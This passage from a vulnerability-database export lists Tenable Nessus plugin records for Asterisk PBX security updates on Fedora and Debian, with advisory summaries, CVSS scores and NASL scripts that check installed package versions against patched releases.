available for immediate download at\nhttp://downloads.asterisk.org/pub/telephony/asterisk\n\nThe release of Asterisk 1.8.20.0 resolves several issues reported by\nthe community and would have not been possible without your\nparticipation. Thank you!\n\nThe following is a sample of the issues resolved in this release :\n\n - --- app_meetme: Fix channels lingering when hung up\n under certain conditions (Closes issue ASTERISK-20486.\n Reported by Michael Cargile)\n\n - --- Fix stuck DTMF when bridge is broken. (Closes issue\n ASTERISK-20492. Reported by Jeremiah Gowdy)\n\n - --- Improve Code Readability And Fix Setting natdetected\n Flag (Closes issue ASTERISK-20724. Reported by Michael\n L. Young)\n\n - --- Fix extension matching with the '-' char. (Closes\n issue ASTERISK-19205. Reported by Philippe Lindheimer,\n Birger 'WIMPy' Harzenetter)\n\n - --- Fix call files when astspooldir is relative. (Closes\n issue ASTERISK-20593. Reported by James Le Cuirot)\n\nFor a full list of changes in this release, please see the ChangeLog :\n\nhttp://downloads.asterisk.org/pub/telephony/asterisk/ChangeLog-1.8.20.\n0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/telephony/asterisk/\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/ChangeLog-1.8.20.0\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ba8b1513\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=891646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=891649\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-January/097815.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?66dfcde1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"asterisk-1.8.20.0-1.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:41:18", "description": "The Asterisk Development Team has announced the release of Asterisk 10.12.0. This release is available for immediate download at http://downloads.asterisk.org/pub/telephony/asterisk\n\nThe release of Asterisk 10.12.0 resolves several issues reported by the community and would have not been possible without your participation. Thank you!\n\nThe following is a sample of the issues resolved in this release :\n\n - --- app_meetme: Fix channels lingering when hung up under certain conditions (Closes issue ASTERISK-20486.\n Reported by Michael Cargile)\n\n - --- Fix stuck DTMF when bridge is broken. (Closes issue ASTERISK-20492. Reported by Jeremiah Gowdy)\n\n - --- Improve Code Readability And Fix Setting natdetected Flag (Closes issue ASTERISK-20724. Reported by Michael L. Young)\n\n - --- Fix extension matching with the '-' char. (Closes issue ASTERISK-19205. Reported by Philippe Lindheimer, Birger 'WIMPy' Harzenetter)\n\n - --- Fix call files when astspooldir is relative. (Closes issue ASTERISK-20593. Reported by James Le Cuirot)\n\nFor a full list of changes in this release, please see the ChangeLog :\n\nhttp://downloads.asterisk.org/pub/telephony/asterisk/ChangeLog-10.12.0\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "nessus", "title": "Fedora 17 : asterisk-10.12.0-1.fc17 (2013-0994)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:17"], "id": "FEDORA_2013-0994.NASL", "href": "https://www.tenable.com/plugins/nessus/64370", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-0994.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64370);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n script_xref(name:\"FEDORA\", value:\"2013-0994\");\n\n script_name(english:\"Fedora 17 : asterisk-10.12.0-1.fc17 (2013-0994)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Asterisk Development Team has announced the release of Asterisk\n10.12.0. This release is available for immediate download at\nhttp://downloads.asterisk.org/pub/telephony/asterisk\n\nThe release of Asterisk 10.12.0 resolves several issues reported by\nthe community and would have not been possible without your\nparticipation. Thank you!\n\nThe following is a sample of the issues resolved in this release :\n\n - --- app_meetme: Fix channels lingering when hung up\n under certain conditions (Closes issue ASTERISK-20486.\n Reported by Michael Cargile)\n\n - --- Fix stuck DTMF when bridge is broken. (Closes issue\n ASTERISK-20492. Reported by Jeremiah Gowdy)\n\n - --- Improve Code Readability And Fix Setting natdetected\n Flag (Closes issue ASTERISK-20724. Reported by Michael\n L. Young)\n\n - --- Fix extension matching with the '-' char. (Closes\n issue ASTERISK-19205. Reported by Philippe Lindheimer,\n Birger 'WIMPy' Harzenetter)\n\n - --- Fix call files when astspooldir is relative. (Closes\n issue ASTERISK-20593. Reported by James Le Cuirot)\n\nFor a full list of changes in this release, please see the ChangeLog :\n\nhttp://downloads.asterisk.org/pub/telephony/asterisk/ChangeLog-10.12.0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/telephony/asterisk/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/telephony/asterisk/ChangeLog-10.12.0\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=891646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=891649\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-January/097762.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4e754851\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"asterisk-10.12.0-1.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:41:44", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by the following vulnerabilities :\n\n - A stack-based buffer overflow error exists related to SIP, HTTP and XMPP handling over TCP. Note that in the case of 'Certified Asterisk', SIP is not affected. Further note that in the case of XMPP, an attacker must establish an authenticated session first. (CVE-2012-5976)\n\n - An error exists related to device state cache and anonymous calls that could allow system resources to be exhausted. Note this vulnerability only affects systems configured to allow anonymous calls. (CVE-2012-5977)", "cvss3": {}, "published": "2013-02-21T00:00:00", "type": "nessus", "title": "Asterisk Peer Multiple Vulnerabilities (AST-2012-014 / AST-2012-015)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*"], "id": "6690.PRM", "href": "https://www.tenable.com/plugins/nnm/6690", "sourceData": "Binary data 6690.prm", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:36:43", "description": "Several vulnerabilities were discovered in Asterisk, a PBX and telephony toolkit, that allow remote attackers to perform denial of service attacks.", "cvss3": {}, "published": "2013-01-14T00:00:00", "type": "nessus", "title": "Debian DSA-2605-2 : asterisk - several issues", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:asterisk", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DSA-2605.NASL", "href": "https://www.tenable.com/plugins/nessus/63511", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2605. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63511);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n script_bugtraq_id(57105, 57106);\n script_xref(name:\"DSA\", value:\"2605\");\n\n script_name(english:\"Debian DSA-2605-2 : asterisk - several issues\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in Asterisk, a PBX and\ntelephony toolkit, that allow remote attackers to perform denial of\nservice attacks.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=697230\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=698112\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=698118\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/asterisk\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2013/dsa-2605\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the asterisk packages.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 1:1.6.2.9-2+squeeze10.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"asterisk\", reference:\"1:1.6.2.9-2+squeeze10\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-config\", reference:\"1:1.6.2.9-2+squeeze10\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-dbg\", reference:\"1:1.6.2.9-2+squeeze10\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-dev\", reference:\"1:1.6.2.9-2+squeeze10\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-doc\", reference:\"1:1.6.2.9-2+squeeze10\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-h323\", reference:\"1:1.6.2.9-2+squeeze10\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-sounds-main\", reference:\"1:1.6.2.9-2+squeeze10\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:45:54", "description": "The Asterisk Development Team has announced security releases for Certified Asterisk 1.8.15 and Asterisk 1.8, 10, and 11. The available security releases are released as versions 1.8.15-cert2, 1.8.20.2, 10.12.2, 10.12.2-digiumphones, and 11.2.2.\n\nThese releases are available for immediate download at http://downloads.asterisk.org/pub/telephony/asterisk/releases\n\nThe release of these versions resolve the following issues :\n\n - A possible buffer overflow during H.264 format negotiation. The format attribute resource for H.264 video performs an unsafe read against a media attribute when parsing the SDP.\n\n This vulnerability only affected Asterisk 11.\n\n - A denial of service exists in Asterisk's HTTP server.\n AST-2012-014, fixed in January of this year, contained a fix for Asterisk's HTTP server for a remotely-triggered crash. While the fix prevented the crash from being triggered, a denial of service vector still exists with that solution if an attacker sends one or more HTTP POST requests with very large Content-Length values.\n\n This vulnerability affects Certified Asterisk 1.8.15, Asterisk 1.8, 10, and 11\n\n - A potential username disclosure exists in the SIP channel driver. When authenticating a SIP request with alwaysauthreject enabled, allowguest disabled, and autocreatepeer disabled, Asterisk discloses whether a user exists for INVITE, SUBSCRIBE, and REGISTER transactions in multiple ways.\n\n This vulnerability affects Certified Asterisk 1.8.15, Asterisk 1.8, 10, and 11\n\nThese issues and their resolutions are described in the security advisories.\n\nFor more information about the details of these vulnerabilities, please read security advisories AST-2013-001, AST-2013-002, and AST-2013-003, which were released at the same time as this announcement.\n\nFor a full list of changes in the current releases, please see the ChangeLogs :\n\nhttp://downloads.asterisk.org/pub/telephony/certified-asterisk/release s/ChangeLog-1.8.15-cert2 http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo g-1.8.20.2 http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo g-10.12.2 http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo g-10.12.2-digiumphones http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo g-11.2.2\n\nThe security advisories are available at :\n\n - http://downloads.asterisk.org/pub/security/AST-2013-001.\n pdf\n\n - http://downloads.asterisk.org/pub/security/AST-2013-00 2.pdf\n\n - http://downloads.asterisk.org/pub/security/AST-2013-00 3.pdf\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2013-04-08T00:00:00", "type": "nessus", "title": "Fedora 17 : asterisk-10.12.2-1.fc17 (2013-4528)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2264", "CVE-2013-2686"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:17"], "id": "FEDORA_2013-4528.NASL", "href": "https://www.tenable.com/plugins/nessus/65830", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-4528.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65830);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-2264\", \"CVE-2013-2686\");\n script_bugtraq_id(58756, 58764);\n script_xref(name:\"FEDORA\", value:\"2013-4528\");\n\n script_name(english:\"Fedora 17 : asterisk-10.12.2-1.fc17 (2013-4528)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Asterisk Development Team has announced security releases for\nCertified Asterisk 1.8.15 and Asterisk 1.8, 10, and 11. The available\nsecurity releases are released as versions 1.8.15-cert2, 1.8.20.2,\n10.12.2, 10.12.2-digiumphones, and 11.2.2.\n\nThese releases are available for immediate download at\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases\n\nThe release of these versions resolve the following issues :\n\n - A possible buffer overflow during H.264 format\n negotiation. The format attribute resource for H.264\n video performs an unsafe read against a media attribute\n when parsing the SDP.\n\n This vulnerability only affected Asterisk 11.\n\n - A denial of service exists in Asterisk's HTTP server.\n AST-2012-014, fixed in January of this year, contained a\n fix for Asterisk's HTTP server for a remotely-triggered\n crash. While the fix prevented the crash from being\n triggered, a denial of service vector still exists with\n that solution if an attacker sends one or more HTTP POST\n requests with very large Content-Length values.\n\n This vulnerability affects Certified Asterisk 1.8.15,\n Asterisk 1.8, 10, and 11\n\n - A potential username disclosure exists in the SIP\n channel driver. When authenticating a SIP request with\n alwaysauthreject enabled, allowguest disabled, and\n autocreatepeer disabled, Asterisk discloses whether a\n user exists for INVITE, SUBSCRIBE, and REGISTER\n transactions in multiple ways.\n\n This vulnerability affects Certified Asterisk 1.8.15,\n Asterisk 1.8, 10, and 11\n\nThese issues and their resolutions are described in the security\nadvisories.\n\nFor more information about the details of these vulnerabilities,\nplease read security advisories AST-2013-001, AST-2013-002, and\nAST-2013-003, which were released at the same time as this\nannouncement.\n\nFor a full list of changes in the current releases, please see the\nChangeLogs :\n\nhttp://downloads.asterisk.org/pub/telephony/certified-asterisk/release\ns/ChangeLog-1.8.15-cert2\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo\ng-1.8.20.2\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo\ng-10.12.2\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo\ng-10.12.2-digiumphones\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo\ng-11.2.2\n\nThe security advisories are available at :\n\n -\n http://downloads.asterisk.org/pub/security/AST-2013-001.\n pdf\n\n -\n http://downloads.asterisk.org/pub/security/AST-2013-00\n 2.pdf\n\n -\n http://downloads.asterisk.org/pub/security/AST-2013-00\n 3.pdf\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-001.pdf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-002.pdf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-003.pdf\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/telephony/asterisk/releases/\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-1.8.20.2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?29e5303b\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-10.12.2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a4695ab6\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-10.12.2-digiumphones\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?05ab7e1a\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-11.2.2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?16e35cb0\"\n );\n # http://downloads.asterisk.org/pub/telephony/certified-asterisk/releases/ChangeLog-1.8.15-cert2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d97a0e84\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=928774\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=928777\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-April/101684.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e95e6b29\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/04/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) 